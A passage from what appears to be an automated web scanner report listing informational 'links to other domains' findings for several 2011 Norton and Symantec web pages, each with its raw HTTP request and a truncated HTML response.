alt="WebTrust">...[SNIP]...
14.45. http://updatecenter.norton.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://updatecenter.norton.com
Path:
/
Issue detail
The page was loaded from a URL containing a query string:http://updatecenter.norton.com/?NUCLANG=en The response contains the following links to other domains:http://sitedirector.symantec.com/932743328/?SSDCAT=267&oslocale=iso:eng&oslang=iso:eng&plang=en&products=NUC&versions=2.0 http://sitedirector.symantec.com/932743328/?oslocale=iso:USA&plang=EN&oslang=iso:ENG&ssdcat=150 http://sitedirector.symantec.com/932743328/?oslocale=iso:USA&plang=EN&oslang=iso:ENG&ssdcat=151 http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:ENG&ssdcat=270 http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=261&origin=nuc http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=262&origin=nuc http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=263&origin=nuc http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=264&origin=nuc http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=266&origin=nuc http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=272 http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=281&origin=nuc http://www.facebook.com/Norton http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FNorton&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&font=&height=21&locale=en_US&ref=NortonUpdateCenter
Request
GET /?NUCLANG=en HTTP/1.1 Host: updatecenter.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 ETag: "" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Fri, 09 Sep 2011 21:46:03 GMT Connection: close Content-Length: 25405 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir = "ltr"> <head id="ctl00_Head1"><t...[SNIP]... <li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=261&origin=nuc"> Norton Online Family</a>...[SNIP]... <li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=262&origin=nuc"> Norton Online Backup</a>...[SNIP]... <li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=281&origin=nuc"> Norton Management</a>...[SNIP]... <li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=263&origin=nuc"> Norton Safe Web</a>...[SNIP]... <li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=264&origin=nuc"> Norton Account</a>...[SNIP]... <li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=266&origin=nuc"> Norton.com</a>...[SNIP]... <li><a href="http://sitedirector.symantec.com/932743328/?SSDCAT=267&oslocale=iso:eng&oslang=iso:eng&plang=en&products=NUC&versions=2.0"> Leave Feedback</a>...[SNIP]... <li><a href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:ENG&ssdcat=270"> Customer Support</a>...[SNIP]... <div class="nortonFbLink"> <a target="_blank" href="http://www.facebook.com/Norton"> <span class="name">...[SNIP]... <div class="socialWidgets"> <iframe class="fbLikeIFrame" src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FNorton&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&font=&height=21&locale=en_US&ref=NortonUpdateCenter" scrolling="no" frameborder="0" style="border: none; overflow: hidden; width: 160px; height: 21px;" allowtransparency="true"> </iframe>...[SNIP]... <li> <a target="_blank" href='http://sitedirector.symantec.com/932743328/?oslocale=iso:USA&plang=EN&oslang=iso:ENG&ssdcat=151'> Legal Notices</a>...[SNIP]... <li> <a target="_blank" href='http://sitedirector.symantec.com/932743328/?oslocale=iso:USA&plang=EN&oslang=iso:ENG&ssdcat=150'> Privacy Policy</a>...[SNIP]... <li> <a target="_blank" href='http://sitedirector.symantec.com/932743328/?SSDCAT=267&oslocale=iso:eng&oslang=iso:eng&plang=en&products=NUC&versions=2.0'> Leave Feedback</a>...[SNIP]... <li> <a target="_blank" href='http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=272'> License Agreements</a>...[SNIP]... <li><a class="footer-link" id="nof" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=261&origin=nuc"> <span class="footer-tt">...[SNIP]... <li><a class="footer-link" id="nobu" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=262&origin=nuc"> <span class="footer-tt">...[SNIP]... <li><a class="footer-link" id="nom" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=281&origin=nuc"> <span class="footer-tt">...[SNIP]... <li><a class="footer-link" id="safeweb" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=263&origin=nuc"> <span class="footer-tt">...[SNIP]... <li><a class="footer-link" id="na" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=264&origin=nuc"> <span class="footer-tt">...[SNIP]... <li><a class="footer-link" id="nortondotcom" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=266&origin=nuc"> <span class="footer-tt">...[SNIP]...
14.46. http://us.norton.com/beta/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/beta/index.jsp
Issue detail
The page was loaded from a URL containing a query string:http://us.norton.com/beta/index.jsp?inid=us_hho_homepage_hero4_2012beta The response contains the following links to other domains:http://www.symantec.com/about/index.jsp http://www.symantec.com/about/profile/policies/legal.jsp http://www.symantec.com/about/profile/privacypolicy/index.jsp http://www.symantec.com/business/index.jsp http://www.symantec.com/business/solutions/smallbusiness/index.jsp http://www.symantec.com/feedback/contactus.jsp http://www.symantec.com/partners/index.jsp http://www.symantec.com/rss/index.jsp http://www.symantec.com/sitemap/index.jsp https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /beta/index.jsp?inid=us_hho_homepage_hero4_2012beta HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Expires: Fri, 09 Sep 2011 21:47:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 21:47:30 GMT Content-Length: 24280 Connection: close Set-Cookie: JSESSIONID=942CFE17E15760F8032358C3716740F0; Path=/ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Antivirus Free Software - Spyware Free Protection | Norton Beta Center</title> <meta http-equiv="Content-Type" cont...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... <span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]...
14.47. http://us.norton.com/beta/overview.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/beta/overview.jsp
Issue detail
The page was loaded from a URL containing a query string:http://us.norton.com/beta/overview.jsp?pvid=n3605beta&inid=us_hho_homepage_hero4_n360v5beta The response contains the following links to other domains:http://sitedirector.symantec.com/932743328/?ssdcat=221&lcid=1033&serviceid=181&pname=N360&pversion=5.0&origin=thankyou&env=beta&layout=esd&tooltype=both http://twitter.com/norton_beta http://www.symantec.com/about/index.jsp http://www.symantec.com/about/profile/policies/legal.jsp http://www.symantec.com/about/profile/policies/privacy.jsp http://www.symantec.com/about/profile/privacypolicy/index.jsp http://www.symantec.com/business/index.jsp http://www.symantec.com/business/solutions/smallbusiness/index.jsp http://www.symantec.com/feedback/contactus.jsp http://www.symantec.com/partners/index.jsp http://www.symantec.com/rss/index.jsp http://www.symantec.com/sitemap/index.jsp http://www.twitter.com/norton_beta https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /beta/overview.jsp?pvid=n3605beta&inid=us_hho_homepage_hero4_n360v5beta HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Expires: Fri, 09 Sep 2011 21:47:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 21:47:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39170 <meta http-equiv="refresh" content="0;url=http://us.norton.com/beta"> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Norton Beta Software - Norton 360 Version...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... <li><a href="http://sitedirector.symantec.com/932743328/?ssdcat=221&lcid=1033&serviceid=181&pname=N360&pversion=5.0&origin=thankyou&env=beta&layout=esd&tooltype=both" target="_blank"> Norton Recovery Tools</a>...[SNIP]... <div class="cbMrgnBtmMD">Please follow the <a href="http://www.twitter.com/norton_beta" target="_blank"> Norton Public Beta Twitter Account</a>...[SNIP]... l support on beta version software products. We do, however, value your feedback on features, usability, and bugs. All information submitted is routed through a secure server and is in compliance with <a href="http://www.symantec.com/about/profile/policies/privacy.jsp" target="_blank"> Symantec...s Privacy Policy</a>...[SNIP]... <div class="promoWdgt"><a href="http://twitter.com/norton_beta"> <img src="/content/en/us/home_homeoffice/images/promos/n-beta10-twitter-promo-b.gif" alt="Follow Norton on Twitter" title="Follow Norton on Twitter" class="imgFltTop " width="180" height="90"/>...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... <span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]...
14.48. http://us.norton.com/norton-utilities/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/norton-utilities/
Issue detail
The page was loaded from a URL containing a query string:http://us.norton.com/norton-utilities/?inid=us_hho_homepage_hero3_nu2011pdpage The response contains the following links to other domains:http://www.symantec.com/about/index.jsp http://www.symantec.com/about/profile/policies/legal.jsp http://www.symantec.com/about/profile/privacypolicy/index.jsp http://www.symantec.com/business/index.jsp http://www.symantec.com/business/solutions/smallbusiness/index.jsp http://www.symantec.com/feedback/contactus.jsp http://www.symantec.com/norton/products/reviews/index.jsp http://www.symantec.com/partners/index.jsp http://www.symantec.com/rss/index.jsp http://www.symantec.com/sitemap/index.jsp https://www.mynortonaccount.com/amsweb/default.do https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /norton-utilities/?inid=us_hho_homepage_hero3_nu2011pdpage HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=3501 Date: Fri, 09 Sep 2011 21:47:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 83835 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Registry Cleaners - Computer Startup Programs | Norton Utilities</title> <me...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... </div> <a href="http://www.symantec.com/norton/products/reviews/index.jsp" target="_blank"> Read more reviews</a>...[SNIP]... <li><a href="https://www.mynortonaccount.com/amsweb/default.do"> Access Norton Account</a>...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... <span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]...
14.49. http://us.norton.com/nortonlive/spyware-virus-removal.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/nortonlive/spyware-virus-removal.jsp
Issue detail
The page was loaded from a URL containing a query string:http://us.norton.com/nortonlive/spyware-virus-removal.jsp?inid=us_hho_support_topnav1_viruses&risks The response contains the following links to other domains:http://ads.bluelithium.com/pixel?id=1406631&t=2 http://bp.specificclick.net/?pixid=99068597 http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&ActivityID=138499&ns=1 http://dm.demdex.net/pixel/19701 http://marchex.voicestar.com/euinc/number-changer.js http://www.symantec.com/about/index.jsp http://www.symantec.com/about/profile/policies/eulas/index.jsp http://www.symantec.com/about/profile/policies/legal.jsp http://www.symantec.com/about/profile/policies/repository.jsp http://www.symantec.com/about/profile/privacypolicy/index.jsp http://www.symantec.com/business/index.jsp http://www.symantec.com/business/solutions/smallbusiness/index.jsp http://www.symantec.com/content/en/us/about/media/nortonlive_tc.pdf http://www.symantec.com/enterprise/contact_sales.jsp http://www.symantec.com/enterprise/support/index.jsp http://www.symantec.com/feedback/contactus.jsp http://www.symantec.com/norton/support/DIY/index.jsp http://www.symantec.com/norton/support/dtree.jsp?pvid= http://www.symantec.com/partners/index.jsp http://www.symantec.com/rss/index.jsp http://www.symantec.com/sitemap/index.jsp https://nortonlive.support.com/ https://www-secure.symantec.com/norton/support/contact/chat/nortonlive.jsp?chatexp=vss https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /nortonlive/spyware-virus-removal.jsp?inid=us_hho_support_topnav1_viruses&risks HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=utf-8 Cache-Control: public, max-age=3123 Date: Fri, 09 Sep 2011 21:47:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36294 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Virus Removal & Malware Removal Service | NortonLive</title> <meta http-...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... <noscript> <img width="1" height="1" style="border:0" src="HTTP://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&ActivityID=138499&ns=1"/> </noscript><img src="http://dm.demdex.net/pixel/19701" width="0" height="0" /> <IMG SRC="http://bp.specificclick.net?pixid=99068597" width="1" height="1" border="0" /> <img src="http://ads.bluelithium.com/pixel?id=1406631&t=2" width="1" height="1" /> <!-- BEGIN NORTON LIVE SERVICES IMPORTS ================================== -->...[SNIP]... <li><a href="https://nortonlive.support.com/" id="myAcctBtn" target="_blank"> My Account</a>...[SNIP]... <p><a href="http://www.symantec.com/norton/support/dtree.jsp?pvid=" target="_blank"> Go To Symantec<br/>...[SNIP]... </p> <a href="https://www-secure.symantec.com/norton/support/contact/chat/nortonlive.jsp?chatexp=vss" target="_blank" class="replaced" id="chatBtn"> Chat With Us</a>...[SNIP]... <li><a href="http://www.symantec.com/norton/support/DIY/index.jsp" id="rsrc2" target="_blank"> DIY Resources</a>...[SNIP]... <td>Each NortonLive Service is subject to acceptance of Symantec’s <a href="http://www.symantec.com/content/en/us/about/media/nortonlive_tc.pdf" target="_blank"> NortonLive Services Terms & Conditions</a>...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... <li><a href="http://www.symantec.com/about/profile/policies/legal.jsp" title="Legal Notices"> Legal Notices</a>...[SNIP]... <li><a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp" title="License Agreements"> License Agreements</a>...[SNIP]... <li><a href="http://www.symantec.com/about/profile/policies/repository.jsp" title="Repository"> Repository</a>...[SNIP]... <span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... <li><a href="http://www.symantec.com/enterprise/support/index.jsp" title="Business Support"> Business Support</a>...[SNIP]... <li><a href="http://www.symantec.com/enterprise/contact_sales.jsp" title="Business Sales"> Business Sales</a>...[SNIP]... <li><a href="http://www.symantec.com/feedback/contactus.jsp" title="Corporate Information"> Corporate Information</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]... </script> <script type="text/javascript" src="http://marchex.voicestar.com/euinc/number-changer.js"> </script>...[SNIP]...
14.50. http://us.norton.com/products/charts/comparison.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/products/charts/comparison.jsp
Issue detail
The page was loaded from a URL containing a query string:http://us.norton.com/products/charts/comparison.jsp?pcid=mp The response contains the following links to other domains:http://www.symantec.com/about/index.jsp http://www.symantec.com/about/profile/policies/eulas/index.jsp http://www.symantec.com/about/profile/policies/legal.jsp http://www.symantec.com/about/profile/privacypolicy/index.jsp http://www.symantec.com/business/index.jsp http://www.symantec.com/business/solutions/smallbusiness/index.jsp http://www.symantec.com/feedback/contactus.jsp http://www.symantec.com/partners/index.jsp http://www.symantec.com/rss/index.jsp http://www.symantec.com/sitemap/index.jsp https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /products/charts/comparison.jsp?pcid=mp HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1366 Date: Fri, 09 Sep 2011 21:47:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 73931 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Computer Security Systems | Compare Norton Products</title> <meta http-equiv="Content-Type" content="text/html; cha...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... subscription to receive virus protection and scanning engine updates. Use of this product is subject to acceptance of the Symantec License Agreement included with the product and available for review <a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp"> here</a>...[SNIP]... eatures may be added, modified, or removed during the service period. Use of each product is subject to acceptance of the Symantec LLicense Agreement included with the product and available for review <a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp"> here</a>...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... <span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]...
14.51. http://us.norton.com/support/DIY/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/support/DIY/index.jsp
Issue detail
The page was loaded from a URL containing a query string:http://us.norton.com/support/DIY/index.jsp?inid=us_hho_support_tovnav2_removaltools The response contains the following links to other domains:http://ads.bluelithium.com/pixel?id=1406631&t=2 http://bp.specificclick.net/?pixid=99068597 http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&ActivityID=138512&ns=1 http://dm.demdex.net/pixel/19701 http://liveupdate.symantec.com/upgrade/NPE/1033/NPE.exe http://www.symantec.com/about/index.jsp http://www.symantec.com/about/profile/policies/eulas/index.jsp http://www.symantec.com/about/profile/policies/legal.jsp http://www.symantec.com/about/profile/policies/repository.jsp http://www.symantec.com/about/profile/privacypolicy/index.jsp http://www.symantec.com/business/index.jsp http://www.symantec.com/business/solutions/smallbusiness/index.jsp http://www.symantec.com/content/en/us/about/media/nortonlive_tc.pdf http://www.symantec.com/enterprise/contact_sales.jsp http://www.symantec.com/enterprise/support/index.jsp http://www.symantec.com/feedback/contactus.jsp http://www.symantec.com/partners/index.jsp http://www.symantec.com/rss/index.jsp http://www.symantec.com/sitemap/index.jsp https://www-secure.symantec.com/norton/support/contact/chat/nortonlive.jsp?chatexp=vss-diy https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /support/DIY/index.jsp?inid=us_hho_support_tovnav2_removaltools HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=utf-8 Cache-Control: public, max-age=3436 Date: Fri, 09 Sep 2011 21:47:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 35700 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Free Virus Removal | Norton Power Eraser</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... <noscript> <img width="1" height="1" style="border:0" src="HTTP://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&ActivityID=138512&ns=1"/> </noscript> <img src="http://dm.demdex.net/pixel/19701" width="0" height="0" /> <IMG SRC="http://bp.specificclick.net?pixid=99068597" width="1" height="1" border="0"> <IMG SRC="http://bp.specificclick.net?pixid=99068597" width="1" height="1" border="0"> <img src="http://ads.bluelithium.com/pixel?id=1406631&t=2" width="1" height="1" /> </div>...[SNIP]... <div id="solution_button"> <a class="button" id="download_button" onclick="javascript:trackOmnitureEvent(this, 'download_solution')" href="http://liveupdate.symantec.com/upgrade/NPE/1033/NPE.exe" > <span>...[SNIP]... <div id="chat_button"> <a class="button" href="https://www-secure.symantec.com/norton/support/contact/chat/nortonlive.jsp?chatexp=vss-diy" target="_blank" id="vss_chat" onclick="javascript:trackOmnitureEvent(this, 'vss_chat_link')"> <span>...[SNIP]... <div id="terms_conditions"> <a href = "http://www.symantec.com/content/en/us/about/media/nortonlive_tc.pdf" target="_blank" id="ps_terms_conditions" onclick="javascript:trackOmnitureEvent(this, 'ps_terms_conditions')"> <div class="orangearrow">...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... <li><a href="http://www.symantec.com/about/profile/policies/legal.jsp" title="Legal Notices"> Legal Notices</a>...[SNIP]... <li><a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp" title="License Agreements"> License Agreements</a>...[SNIP]... <li><a href="http://www.symantec.com/about/profile/policies/repository.jsp" title="Repository"> Repository</a>...[SNIP]... <span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... <li><a 